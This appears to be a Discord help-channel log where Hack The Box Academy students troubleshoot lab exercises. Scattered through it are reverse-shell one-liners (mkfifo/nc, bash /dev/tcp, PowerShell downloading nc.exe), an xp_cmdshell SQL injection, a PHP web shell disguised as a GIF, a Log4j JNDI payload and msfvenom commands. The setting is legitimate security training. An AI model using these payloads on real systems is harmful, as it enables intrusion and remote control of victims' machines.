#modules
Just visit in browser
404
oh i didnt realize that it was not on both. Ok thats a good sign. But the last two Qs talk about crawl the inlanefreight.htb domain.... do they mean
*.inlanefreight.htb
or
inlanefreight.htb/*
doesnt matter much but im not getting anything other than what i already have for both
maybe ferox buster is the move here
but i havent had any success with either uh ReconSpider, ffuf for content enum on either the sub or the domain so im not sure what another fuzz is gonna do
like not even one result to let me know im on the right path
Both directions, if you cant find anything on your current subdomain. Dig deeper
And by dig deeper i mean: look for other subdomains
When you find a new subdomain, add it to the hosts file
Thank you for the advice. But ive used practically every subdomain list. I did find the one with admin, are you saying theres more than 1? Sorry if im asking to be spoonfed here.
Rinse and repeat
That won't have hidden admin
Btw
And a crawler won't find the hidden file, because robots says no
I see, thank you. I think I've "made the loop" but i dont have any content yet that i can tell certainly not anything with an email or additional api key
im gonna try reconspider again i guess
hello can someone help me on Documentation & Reporting - Skills Assessment
i have 3 hosts and got root on 2 of them but i can't even ping DC
nvm, reset the lab and dc ip pop-up
Hi everyone, could someone help me with understanding something? I'm on the Logrotate section of Linux Privilege Escalation and I'm a little confused. I get the concept of using Logrotten to run a payload when it rotates a log file, but I dont understand a couple things.
- how do we know that Logrotate manages the .log files within the /backups folder
- how do we know what mode logrotate is using for those log files
- how do we know we need to enter text inside the log file to force it to rotate?
And also how do we know that the flag is located in /root/flag.txt when we cant look inside /root?
Is there maintenance on the labs ?
The machine disappears and comes back ???
seeing same as you hklm, like RDP sessions refreshing every couple minutes
Yup that is what I see, was very stable the last 2 weeks but this evening
103 packets transmitted, 43 received, 58.2524% packet loss, time 103499ms
could anyone point me in the right direction? I am trying to coerce from Target to my box, Target has webdav on, I got responder up on my box, but when I use Coercer with coerce it says [!] (NO_AUTH_RECEIVED) (it's from NTLM Relay Attacks)
@hazy brook Please do not post content from modules above tier 0, especially skill assessments
I thought it was quite censored, sorry
I will never understand why if the purpose of the platform is to learn, doubts cannot be shared.
Anyway, that's fine too
Doubts can be shared, but exposing stuff like usernames/passwords and techniques (especially for skill assessments) just creates shortcuts for people that are lazy
Can I possibly get some assistance for the Unit Active Directory Enumeration & Attacks? The Section is Internal Password Spraying - from Linux & the question is: Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer. So far I have made the username list via using kerbrute & when running this command (kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 found_usernames.txt Welcome1) I do not get any found usernames starting with 's'. I tried restarting the ip address via hackthebox and it also gave me the same issue as before.
So you are connecting to the provided attack box via SSH, executing the attack from an internally connected host, and it is failing or running and just not finding the user?
Yes I am attacking from the internally connected host. It is running but it is just not finding the user
You can DM what you got.
DM me if still stuck
Windows Privilege Escalation - Kernel Exploits CVE-2020-0668 Example
I was trying to get net start MozillaMaintenance to work in the RDP machine which resulted in The program or feature "\??\C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" cannot start or run due to incompatibility with 64-bit versions of Windows. Please contact the software vendor to ask if a 64-bit Windows compatible version is available.
Module: Pivoting & Tunneling
Section: Meterpreter Tunneling & Port Forwarding
I'm working on the exercise of this section, and I'm doing everything according to the module
I'm trying to setup a socks proxy with metasploit, and I see the exact same output as shown in the module, yet when I perform the nmap scan with proxychains I get filtered instead of open for port 3389 on host 172.16.5.19 (obtained by the ping sweep).
Did anyone have the same issue?
I tried both SOCKS5 and SOCKS4 and the results are still the same
Hi
In attacking common services easy lab
I got a reverse Shell with powershell base64 in my kali
But i cant execute any command
I dont know why, i know if You have a Linux You can get a interactive Shell
In Windows powershell can i do the same?
your question doesn't really shows what kind of problem you're having
I used this command to spin up maintenanceservice.exe:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=localport LPORT=notpythonport -f exe > maintenanceservice.exe
Anyone doing the new module attacking AI application and systems yet
Need some help
Once you get cve-2019-10945 working it will show you the filename of the flag. Because this is in webroot you can just curl the vHost and the filename of the flag. The return is the contents of the flag.
I broke things and still confused about how to get this deprecated cryptographic to work
this is for https://academy.hackthebox.com/module/147/section/1335
tried these but nothing worked
https://github.com/ThePorgs/Exegol-images/issues/367
https://github.com/fortra/impacket/issues/1716
even booting up the HTB PWNBOX but that is more broken than my system
[*] GOT CERTIFICATE! ID 13
Exception in thread Thread-6:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner
self.run()
~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
ADCSAttack._run(self)
~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
certificate_store = self.generate_pfx(key, certificate)
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
p12 = crypto.PKCS12()
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in getattr
obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'
Describe the bug There is an issue with the PyOpenSSL library used by Impacket. Indeed, we encounter the following error when trying, for example, to retrieve an ADCS certificate : AttributeError: ...
Configuration impacket version: 0.11.0 Python version: 3.11.8 Target OS: Kali Linux Debug Output With Command String ntlmrelayx.py -t ldaps://domain.com --shadow-credentials -smb2support --no-dump ...
Hello guys, how come when i am AS-REP Roast, when i get the hash with kerbrute i can't crack it, but when i get the hash with GetNPUsers.py I can crack it....
Doesn't make sense to me
Kerbrute command:
kerbrute userenum -d htb.local --dc 10.10.10.161 /tmp/forest/users.txt
GetNPUsers.py command:
for user in $(cat /tmp/forest/users.txt); do python3.11 GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done
Anyone know if JuicyPotato is intentionally not meant to work on the target @ Windows Privilege Escalation Section: SeImpersonate and SeAssignPrimaryToken
I can't reveal much more than that without spoiling module content... so DM if you know
It does work, your command is probably not correct
may I DM you to check my cmd please? edit: resolved, thank you Nathan
why does going xxx.inlanefreight.local and IP on firefox bring me to different pages?
am i not essentially querying the same IP?
the subdomain is mapped to a different webroot
That's a vhost.
Perhaps some formatting issues in Kerbrute's output hash. Personally, I've never faced such an issue before.
Try nxc, it does a good job too.
thanks
I just completed introduction to active directory along the guided labs, the labs were fun
Where should i go next from here?
its from which section ?
i doing Attacking the OS section , not reached there . 
Hi everyone
Attacking Common Applications - Skills Assessment III
what to do now ? idk reverse engineering much
could someone please help me with this sections it been pure pain for the password attack module everything was fine until legit this section couldnt configure my kali so grabbed a VM of a older version of Kali and now have this as my "Base64 Certification of user DC01$:"
https://academy.hackthebox.com/module/147/section/1335
Easiest thing to do is to just use that cert with netexec
```
└─$ nxc smb -h
<SNIP>
--pfx-base64 PFXB64 Use certificate authentication from pfx file encoded in base64
```
huh this wasnt on the material but if this work r1cky you have saved me legit been on this for a few weeks now...
of course this old kali doesnt have netexec hahahaha
You're right it wasn't in the material, so I guess it is a little extra for your notes.
where did you find this info prior knowledge or just searching how to authenticate with pfxb64 files?
very curious how fast you came to hit me information hahahaha
I like to learn as much as I can about the tools I choose to use. A course can only teach/show you so much, which should be the element to drive your curiosity and desire to learn more on your own.
true perhaps I need to expand my knowledge more on your comment, I am curious although it tends to result in broken VMs hahahaha
Nothing a snapshot can't fix
ive had bad experiences with snapshots hahaha
although could try again since its at my own home
Hello
So yeah anyways, use the labs as an opportunity to explore tools and different ways to perform the same thing. The 2 is 1 and 1 is none mantra should always be used, otherwise that one tool you rely on becomes a single point of failure when it doesn't work.
very true just like a failure domain with switches and routers xD
cheers r1cky might have to start looking at those retired lab boxes
is anyone having issues with the NTLM Relay Attacks module too? I literally respawn the lab non stop and .60 will not turn on...
https://academy.hackthebox.com/module/147/section/1335 Can someone help me with this section I got certificate but
And why I got 2 ips in the task where I should put them
I am still stuck. Appreciate any hints or pointers. Thank you.
Hi guys, I'm in this /module/69/section/2083 few days ago, someone can help me with this question - Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).
Can someone say me for what purpose I need second IP
One IP is the Domain Controller (DC) and the other is the Certificate Authority (CA).
This is from the Bloodhound module?
You need to find something that isn't the DC, as it might contain information that can help you understand the environment.
Which section?
NTLM Relay Attacks targeting kerberos, after 3 or 4 restarts .60 finally booted
I opened a ticket anyway (got a little frustrated because I am time-constrained and waiting 3-5 minutes for each restart makes it tough)
MeshCentral?
So if you got Q1, take some time to enumerate that host.
yes it's that
Are you still stuck?
YES it's the last question for finish this module and i found 13 users 3 have quick acces for admin for me it's 23.08% but i did something wrong the answers it's not accepted
DCOM?
Yeah, go ahead and DM.
Module: Linux Fundamentals
Section: File System Management
If you have to kill open files before unplugging a storage device in this case a USB drive, to prevent corruption or wtv.
Why does he use 'lsof ~ grep cry0l1t3', wouldn't you use something that targets the USB instead? Sorry if my question comes across as naive.
It's not a guessing game. Simple host-based enumeration.
```
10.129.142.56 DC01.INLANEFREIGHT.LOCAL DC01
```
here my /etc/hosts
Please refrain from posting content from modules above Tier 0.
I just want to understand why I always get this error, I tried to reboot targets so many times, and it didn`t work
You can DM.
Dmed you
Replace the tilde "~" with the pipe sign I don't have on my keyboard.
|
May I DM you?
Sure
Lmk if it worked?
Did anyone complete the esc11 lab in Adcs attacks module? facing some issues
tried ways to dump local administrator ntlm hash on ws01 but no luck till now
i am going through a problem in module password attack sub module pass the certificate a certificate was issued for DC01$ it is not issuing the certificate i have tried the given command for my PTCDC01 and PTCCA01 for printerbug.py and vice versa i know what to do but it is not working for me please guide me someone
@soft moon may i gain some insight i pinged because you and i am in same submodule??
Im as lost as you are sadly
taking a break and doing some retired boxes tomorrow just overworked myself today
I'm working the nessus assessment and im curious if i need to install nessus... i see a service listed here but i get an error trying to start it.
i guess me too rest here since i cannot gain a TGT as DC01$ initial part for PTC
You can DM what you are trying.
No you should not have to install Nessus.
okay, thank you.
Module: Attacking Common Applications
Lesson: Attacking Thick Client Applications
After I disable the permissions on the users, and run ./restart-oracleservice.exe the files aren't created. Can I get a nudge, I'm very lost lol
not seeing an icon on the desktop anywhere or in the menu. see it listed in dpkg but cant call it? any advice how to kick this thing over?
maybe i need to enable then start?
Are you on the skills assessment?
yes
Do i need to run it from inside the 10.x.x.x box?
run it when ssh'd in to 10.x.x.x*
It should be accessible at https://10.129.xxx.xxx:8834
you can access nessus via web
it's already running on the server
thanks that wasnt apparent. i saw the reminder but it only mentioned how to access not that it was already running
Chats a lull, @fathom pendant unrelated to the module, do you find the nessus html (or other) report output to be less than useful for our purposes? I can see this being helpful for at a glance stuff for like non-technical reviewers or something but the fact it will output an html doc that doesnt have the stuff the full report in the service has... seems less than helpful. Is that what the nessus db export thing is for?
Automated tooling only goes so far
I find it in the same vein as winpeas or linpeas or any of those tools
All the stuff you need is in the web dashboard but i thought the report would be more helpful than just a CVSS score, a link to details and the description of the identified issue or whatever.
Ok i see what you're saying and agree.
Sorry everyone, does anyone know why the windows rdp keeps disconnecting even when I connect via pawn machine
thats sorta "normal" in my experience.
i think some people say to connect with udp or something? i dunno i just struggle thru it and get it over with
Tcp
Password attacks --> Credential Hunting in Network Shares. I'm stuck at this question: One of the shares mendres has access to contains valid credentials of another domain user. What is their password?
I tried to search for the following keywords "pass", "INLANEFREIGHT\" via man spider but none of the discovered passwords is the answer. Any idea on where I'm going wrong? Thanks
what happened
spider will not work
you have to manually try that...manually hunt for that file
netexec will throw you an error
and why is that? You're supposed to apply what you studied above in the module
yeah...because of some reason ..i dont know the reason..its maybe lab issue..its throws error...but you can dm me for further info
I have progressed using a py file thank you for asking and on nthash part right now
connection issue maybe?
ohkk np
looks like you can't receive my dms
i can
Hmm okay thanks
try again
nvm. It worked fine from the pwnbox
Is there some kind of maintenance on the labs because I am losing my RDP connection every minute or so
Or is there something I can do ?
Are you using the VPN at the same time as the pwnbox?
No I only use the vpn.
try servers or regions
I will
Is UDP or TCP more stable ?
TCP
https://academy.hackthebox.com/module/24/section/514
Question about whats being asked in the question #1
`Download the file flag.txt from the web root using python FROM the pwnbox. submit contents`
Does it want me to setup a python http.server (or similar) on pwnbox then upload it from the target?
or Download the file from the target where a python server is setup?
or use python to issue a get request? this is a strange way to word the question
(i understand the module, im just trying to stay as close to the "rules" as possible here)
I dont believe a "download with python" was mentioned in the sections. theres an "upload a file with python"
Im not gonna get too hung up on how, i've done it both ways by following the modules its just an odd wording. Thank you
i'm Windows Privilege Escalation > Citrix Breakout . The citrix environment is so slow. I tried a different vpn but same experience, Is this normal?
Some environments are slow, super slow
Try changing servers or regions. I've seen this help a lot.
Hello everybody I can't wait HOLMES competition
Hello guys, i cant really seem to able to type in any other channels, I am new to this channel but not new to cybersecurity, i know some concepts but they are very shallow and basic. I have been trying to figure it all out but it is very messy and i dont have a clear path. Is there anyone who can be my mentor please.
Anyone around for the Pivot Tunneling and Port forwarding module? I'm stuck on the last 2 questions on the skill assessment I have the user but no creds
Getting Started Module: I've had this issue for Nibbles and also the Knowledge Check after Nibbles: Essentially I get to the point where I'm trying to pop a shell and I can get it to do php commands such as whoami but no matter what reverse shell I try, I can't pick up packets. I'm routing it to the tun0 from the vpn but still
replace the example command where it uses /dev/tcp/ip/port with your ip/port that you're using
i.e. /dev/tcp/10.10.14.1/7777
i found i could ||edit the theme file||
so figured that was an option in
you can see the www-data from the whoami but my "nc -lvnp 4444" isnt picking anything up
@rugged star try not to spoil skill assessments (knowledge checks)
o my b
try using the full filepath of the binary /bin/bash
also your revshell is missing a whole bunch of stuff
review the "nibbles - Initial foothold" section again
also you may want to incorporate using the "/bin/bash -c 'the other command here'" to ensure that you're running it all in bash
also make sure you're running your listener before you call the webpage to have it call back to you
check, and also ||system("/bin/bash -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP_HERE PORT_HERE >/tmp/f"");|| this is my command now
still dont see anything in my shell after it says "listening on 4444"
Found your problem
You mixed your quotes
"/bin/bash -c" [some middle bit]""
Use single quotes to wrap the secondary command
Did you perform post exploitation on previous hosts? This should help to harvest creds.
did you mean like ||system("/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP_HERE PORT_HERE >/tmp/f'");||
Yes
There's a syntax error in that command because you've got 2 sets of double quotes. Nested quotes need to be either escaped (\"\") or single instead of double.
didnt get anything..
if it helps im not on the parrot vm im on arch im new to this universe so not sure what could affect what. I'm also using a different local shell called fish but dont think that matters
that makes sense
hello everybody i have a problem with exploiting the log4 vulnerability i create the pay load
- java -jar ~/Apps/ysoserial-modified/target/ysoserial-modified.jar CommonsCollections5 bash 'bash -i >& /dev/tcp/10.10.16.24/9001 0>&1' > cc5.ser
- then run the java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -L 10.10.16.24:1389 -P cc5.ser
- have the nc -nvlp 9001 running and insert in tomcat but he give me always this ERROR BACK and i tried everypayload from JNDI EXPLOIT KIT
- 2025-08-20 23:49:48 [LDAPSERVER] >> Send LDAP reference result for jkgzsw redirecting to http://10.10.16.24:8180/ExecTemplateJDK6.class
2025-08-20 23:54:12 [LDAPSERVER] >> Send LDAP reference result for 9qlr0e redirecting to http://10.10.16.24:8180/ExecTemplateJDK8.class
yea im not sure. Im confused why I cant get this to work since the "whoami" is working and im using the recommended command from the nibbles - initial foothold. this machine isnt blocking any commands or has a firewall right? i mean its in the getting started module
pretty sure i also confirmed that i can receive packets from it, cant remember how i did that but specifically reverse shell isnt working
Not sure if they are on pwnbox. I used my VM and brought them over.
how did you compile the pwn.c
no, they aren't on the pwnbox. Generally speaking, I just pillaged all the stuff from the relevant C:/Tools/ files on the AD enum module and win priv sections
i would appreciate a little help 
Which module is this from?
@cedar mural Please don't reveal content from modules above tier 0
My bad, didn't realize I was revealing much
im still looking for any ideas on this if anyone can think of anything
omg i did it i found a firewall on my machine lets go finally
Yeah, best to ask in #boxes
Hey everyone, I'm stuck on a Blind SQLi to RCE problem and would appreciate a nudge in the right direction.
I'm using xp_cmdshell to get remote code execution. My PowerShell payload successfully downloads nc.exe from my machine to the target's c:\windows\tasks\ directory - I can see the GET request on my local web server.
However, the second part of the command, which should execute nc.exe to start a reverse shell, doesn't seem to work. I'm not getting a connection back on my netcat listener.
Here is the decoded PowerShell command I'm trying to execute:
(new-object net.webclient).downloadfile("http://10.10.16.4:8000/nc.exe", "c:\windows\tasks\nc.exe"); c:\windows\tasks\nc.exe -nv 10.10.16.4 1337 -e c:\windows\system32\cmd.exe;
And here's the full SQL injection payload I'm using (URL decoded for clarity):
'; exec xp_cmdshell 'powershell -exec bypass -enc <BASE64_PAYLOAD>'-- -
I've confirmed my listener is up on port 1337. Any ideas why the nc.exe execution might be failing? Perhaps an issue with permissions, antivirus, or firewall rules? Any tips for debugging this would be a huge help! Thanks.
i think this question might have to be updated
The answer i get when i get the banner in the box is ******_9.2p1 ******* but the correct answer is ********_8.2p1 ****** when i reveal the answer.
#1234357888114364508 is the place to post about module corrections
tnx did not know
it also helps to provide the module and section name so others can sanity check you
was just going to do that
tells me that i cant post there, that i need a "tagg"
select one of the tags when creating the post
oh my bad 
it's ok. discord doesn't make things intuitive sometimes
Done
can anyone help? in question Submit the Administrator's flag from C:\Users\Administrator\Desktop from Windows Privilege Escalation > Citrix Breakout, i start the smbserver but when i go to paint within the citrix environment and put in the UNC \kali_ip\share, it doesn't connect
Have you received an answer to this? I have the same issue.
Have you received an answer to this? I have the same issue
I have the same issue
Write the literal word PORT
Pls help ;-;
pls advise
Can anyone please help to get ligolo client working on a windows target ?
For context -- chisel did not work on this target either
Is that a firewall problem
which module section and question is this about
your error says the machine is actively refusing connections on that port, so some kind of network issue/not running the right syntax/wrong port/not privileged since it's port 443 etc
@eternal crystal may i ask for your guidance since i am in the same module?
i was working on the info sec foundations pathway a few months ago and stopped cause of school and work -- since then i have used the material roughly enough to be able to glance over my notes and understand what was happening quickly. im getting back into it with the summer ending and am wondering if its worth reviewing all my notes from this pathway or just finishing it off and building off what i currently have while pursuing pentest path
i feel like if i have any questions or info gaps i can just fill in or google whats necessary rather than spending all that time redoing modules
My monitor just broke guess no more coding for me for a while
Please keep the spoilers to a minimum @eternal crystal - take it to dm with them as this is not a tier 0 module
Also removed your question as you were showing partial solutions
i did mark them as spoilers and didn't reveal anything specific, can you please explain how am I supposed to ask for help without giving too much info then?
sorry for that, new to the server
Marking something as a spoiler isn't enough. You could say "I am stuck on module X section Y, can someone help?"
no problem
i am stuck on the skill assessment of password attacks module after the initial foothold. can somebody who has done the updated module help me over the DMs? ty
you can dm me if you want @eternal crystal, tell me what you've got and I'll try to help
Hello everyone. I'm currently doing the cjca path . I'm stuck in introduction to bash scripting module. In the flow control loops section. Can someone help plz
Hello, everyone. I'm working on the module Attacking Common Services - Easy. I found a user via ||smtp-user-enum|| and attempted password spraying on FTP, but it didn't work. Any advice would be appreciated.
I also ran ||Gobuster to brute-force subdomains||. When I checked http://<ip>, I only saw a message saying ||'allow file upload'||, but I can't figure out where the upload point actually is.
I attempted hydra mysql,but still failed
on the Filtering contents lesson, the final question is to find the number of sub-directories of the url https://www.inlanefreight[.]com using cURL. how does one solve that?
Thanks
Hi, is there a way to reset an academy module, at least the answers I have provided?
there is option to retake modules..but i never tried that dont knw what it does
dm me if you still need help
I tried that, It just brings you to the beginning of the module
Doesn't reset the progress
Thanks anyways though
@eternal crystal for that i recommend everyone to complete pivoting module first..it clarifies most of the questions and problem one should face...because socks proxy dual pivot all that stuff
even if you know answer then try to get to that answer....now the diff is you dont have to submit it..you just know that you got the flag
that's what you can do
hahaha
for which modules you are trying that?
Almost the entirety of the defensive modules I unlocked xd
ohh ohkk
You in the right way continue enumeration look at port of ftp
Hello all, I'm stuck at API attacks BOLA section, if tried using the for loop and manually but i get 404 not found.
In the path /api/v1/supplier/quarterly-reports/[id]
Wordpress - Skills Assessment
I'm stuck on this question for a while.. i think i am not getting the question in real sense.
Can anyone have hint about this?
Hello, im stuck on the Wi-Fi Penetration Testing Basics in the airgraph-ng part, i created a png graph, but i definitely not know how to show the graph/open the image,
heyo, use a common tool to get the vulnerable plugins.
Make sure you are using the supplied credentials. Could also fuzz this with Burp or with another fuzzing tool.
Yes i logged in using the supplied credentials then copied the jwt
Then used the given script changed the IP,port and path still no response
Used my token too
I didn't try the script, I just used Burp, so I cannot say if there is an issue with script or not. If one thing fails and continues to fail after troubleshooting, maybe it's time to try something else then circle back to the original later.
Let me capture the request in burp and fuzz the IDs.
If you still get 404s, I'd reset the target and if it persists, try switching VPN regions, etc.
what do u mean?
Hello, does anyone know how to use responder over ligolo pivot tunnel?
Any ideas?
@gray yacht can you guide where i am making mistake?
the question is telling you to find a vulnerable plugin, after that read what the vulnerability does and how you can use it to answer your question.
read above
i have found LFI Vulnerability but can't figure out which file should i have to open
Hi all, i have a question. I m currently doing the "PRTG Network Monitor" module, but i can not obtain the reverse shell through the param execution via web GUI. I have used all the powershell reverse shells like for e.g. 'Power Shell #2' of 'https://www.revshells.com/' , but nothing works. I tried also the IEX technique, using a python server on my kali, i received the GET request from the target OS, but nothing on the nc listener. Can someone help me figure it out?
I had to remove the link it was a spoiler. Look at the exploit, the answer is there.
i didn't even got the link 
damn i got that man, thanks
i learn i have not to rely on output, must have to enumerate further manually
Would anyone be willing to help me with Burpsuite/Zaproxy? I am trying to bypass whitelist filter and I can't seem to do it.
What's the issue
On Zap I always get file successfully uploaded. On Burp I always receive Only images are allowed.
In the response
Hey, im stuck on the Airdecap part in the wifi penetration basics module, i have a pcap file, but how can i read it? im in cli so wireshark cannot open it ?
morning! i am only on the setup module or stage on HTB, experimenting with Wave, how do i create a bashrc file as i do not have one and am stuck on this
no sorry its a -dec.cap
Why can't you open/read it, is Wireshark not installed?
I'm on SSH on the machine, so i have only CLI, maybe im doing something bad idk?
ssh from the pwnbox
Pretty sure that section gives you credentials to RDP into a host or am I looking at a different one?
2 different protocols/services. I would use the creds to RDP as it suggests.
and how do i rdp from the pwnbox please?
Can look for xfreerdp, rdesktop, remmina as they can all provide you with a means to RDP. It's highly likely that you can use xfreerdp with pwnbox. I do not use pwnbox, so I cannot say for certain which is on it.
What's the question
Burp/Zap don't show me when files actually bypass or maybe I am misunderstanding. I am able to upload the file but when I access it I get a 404 or that the file has errors.
ok workin thx
DM me please
can i dm u?
yeah sure.
https://academy.hackthebox.com/module/136/section/1290
||curl 'ip:port/profile_images/shell.phar.jpg?cmd=id'||
||GIF8 <?php system($_REQUEST['cmd']); ?>||
Why don't I get the cmd output?
u uploaded this
GIF8 <?php system($_REQUEST['cmd']); ?>
I uploaded the file with that as the content
dm me
done
guys, I'm having a problem with API Attacks -> broken authentication, I'm resetting the otp from email-otp end point of main MasonJenkins@ymail.com after resetting going to reset end point and capturing the request in burp, using intruder im fuzzing from 0000-9999 but all i receive is SuccessStatus:FALSE
what am i doing wrong
on all responses successstatus is false
now what should i do
Go ahead and DM what you are trying.
oh im sorry, didnt know that, could you explain what i might be missing?
https://academy.hackthebox.com/module/115/section/1205
i'm trying to do the msfvenom payload creation on a windows machine because it was the box used in the last section and this section only covers linux.
once i have the exe output, can i ... its a binary... i cant just cat its base64 encoding and copy paste right? these scenarios assume we have a way to deliver the exploit to the target machine?
nvm this is mentioned in the section, you DO need a way to deliver it
https://academy.hackthebox.com/module/147/section/1335
Ive managed to get the TGT ticket for the machine account, but I'm unable to dump the Administrator hash using either -just-dc-user or -use-vss. Could anyone explain what i might be missing?
You can DM what you are trying.
hey so im run this to confirm a password change: proxychains crackmapexec smb 172.16.8.3 -u xxxxx -p xxxx
but im only getting: [proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
my proxychains.conf is as follows. Why am i not getting a confirmation?
Try to run the command with sudo
ok with sudo now im getting this
hello everyone i am trying the Intro to Academy's Purple Module Page 6Usage Example: JetBrains TeamCity CVE-2023-42793 the Enabling Debug Mode for RCE and when i use it it shows this curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.dWRYeEc2dFM3X2VuRV9yZTJCbFpOcUloNWVV.Y2M0ODIzZGEtMTUyNy00NmY3LThiNzgtM2E0M2YzMmY0YjQ4" -X POST "http://10.129.76.28/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true"
Could not authenticate with provided token
To login manually go to "/login.html" page am i doing something wrong
Hi to everyone, I have a problem to find the proper wordlist for this question:
What is the API key in the hidden admin directory that you have discovered on the target system?
I have already used "subdomains-top1million-110000.txt"
Module: Information Gathering - Web Edition
Content: Skills Assessment
I got it, my ssh session didnt have -D 8081
aye greetings yall, I'm having trouble with the file uploading module, type filters https://academy.hackthebox.com/module/136/section/1290; I found what extensions are allowed and the content types, but I can't seem to be able to upload anything, I always get only images are allowed. the wordlist I use is generated with
#!/bin/bash
for char in '' "%20" "%0a" "%00" "%0d0a" "/" '.' "." "…" ":"; do
for ext in $(cat allowed_ext); do
echo shell$char$ext.jpg >> wordlist.txt
echo shell$ext$char.jpg >> wordlist.txt
echo shell.jpg$char$ext >> wordlist.txt
echo shell.jpg$ext$char >> wordlist.txt
done
done
Re-read the section. It doesn't say anything about the extension, the whole section is about the content type and mime type.
@little belfry This isn't the channel or server for something like that.
the hint says to use a whitelist bypass technique to bypass both extensions checks, i'm not sure what you are referring to ?
The section you linked is for bypassing types (mime, content.) Have you tried the techniques taught in the section? You should focus on those.
yes, I've tried pretty much everything for the last couple hours
Something that helped me was getting an actual image file (jpg, gif, whatever), uploading that through a web proxy, and modifying the request by deleting the data (sans the file signature) and inserting the web shell payload.
hmm, just how much of the magic should I leave there? I've tried with the following magics
GIF8
GIF87a
GIF89a
PNG
οΏ½οΏ½οΏ½οΏ½JFIFοΏ½οΏ½C
and with the following content-types
image/png
image/gif
image/jpeg
A file signature is data used to identify or verify the content of a file. Such signatures are also known as magic numbers or magic bytes and are usually inserted at the beginning of the file.
Many file formats are not intended to be read as text. If such a file is accidentally viewed as a text file, its contents will be unintelligible. However,...
Get a real picture to upload and work your way forward from there, replace and test one thing at a time to see what exactly is blocking it
from the looks of it it just gets blocked because of the content of the 'picture'. I have the same image uploaded with multiple content types / magics, but when I try to put the shell in there i get the error of "only images are allowed"
well it might just have been me deleting the ending of the packet with zap (at the end there is a large number that was getting deleted along with the content of the photo ... took bout 4/5 hours to realize that)
god damnit man, it really was the random way zap ends packets
Windows Privilege Escalation Further Credential Theft
I am not able to run the xfreerdp /v:targetIP /u:jordan /p:HTB_@academy_j0rdan! command for the first question
[15:08:43:635] [6187:6188] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[15:08:43:635] [6187:6188] [WARN][com.freerdp.crypto] - CN = WINLPE-SRV01
[15:08:43:836] [6187:6188] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[15:08:43:836] [6187:6188] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[15:08:43:836] [6187:6188] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[15:08:43:836] [6187:6188] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
try wrapping the password in quotes
https://academy.hackthebox.com/module/315/section/3771 (Attacking AI - Application and System, Model Deployment Tampering)
I'm having some trouble with last step. For some reason I'm getting a YAML parsing error in JSON response.
{
"code": 500,
"type": "InvalidWorkflowException",
"message": "Failed to parse yaml."
}
Also, I don't see last RCE request. It seems like MyScriptEngineFactory.class is actually getting downloaded properly (200 code), but never executed. I'm not totally sure that provided YAML is enough to successfully exploit the service. Maybe someone had the same issue?
Same result
did you wait 5 min after spawning the target?
When I rebooted the box/target no but I let it run for an hour prior to reboot.
idk should be working maybe try remmina or something else to see. double check network connections etc
Can someone help with this one? pretty sure i'm following exactly as shown in the module but having issues connecting to my kali share
The pass was misspelled
Hello
im in the middle of https://academy.hackthebox.com/module/115/section/1139 and im wondering if someone knows of another vnc tool than xfreerdp that will work for a "dynamic-resolution" this one doesnt work for the foothold box (maybe cuz its linux?) my screen is too small i just minimized the terminal and i cant "get" it.
nvm remmina got me sorted
Windows Privilege Escalation Citrix Breakout: Submit the Administrator's flag from C:\Users\Administrator\Desktop
How do I get out of the windows iso to do what I need to do in the ubuntu terminal?
You can DM if you are still having issues.
So you are provided a foothold correct? So take a small bit of time to enumerate that foothold a little as some things are in plain sight. I am also going to delete these screenshots as that module is above Tier 0. Regardless that should hopefully help you get started. Sorry I forgot what channel I was in when I posted this response.
@gray yacht thank you will do when I have time to tackle this question again
i'm working this one too at the moment ^_^
let me know if you want to soundboard ill be on for another hour or so
fuckin thing is CREEPIN
ok i think its clear once its clear. keep your nmaps short and sweet. --top-ports 500
my nmaps were hanging
it was as simple as checking for creds stored in the foothold
but ty
hey mind if we dm about a few things? i am solving it now and wondering how you came up with what you did
i mean only thing ive solved is q1 but sure
well
managed to infiltrate
Find the hidden admin directory first
Use wordlist-mode with rockyou.txt to crack the RIPEMD-128 password. can anyone help me as i am stuck over here how to do it where to find the hash password attack module
Dumb idea, but for Pentester Pathway, should I skip the AD module, finish the web modules and then go back to AD modules before I do AEN?
You can go in any order you want. Some modules build off previous knowledge from the path though.
hello everyone. im new here can someone help me a bit?
just to start. assming im a full beginner and want to start. where should i start? which path or module you guys suggest?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
so it means i should start with networking? and i wanted a tip... im kinda broke rn so should i really consider buying htb to access other things which i cant now
come in dm please
Why?
There are many Tier 0 modules in the Academy. They are free of charge.
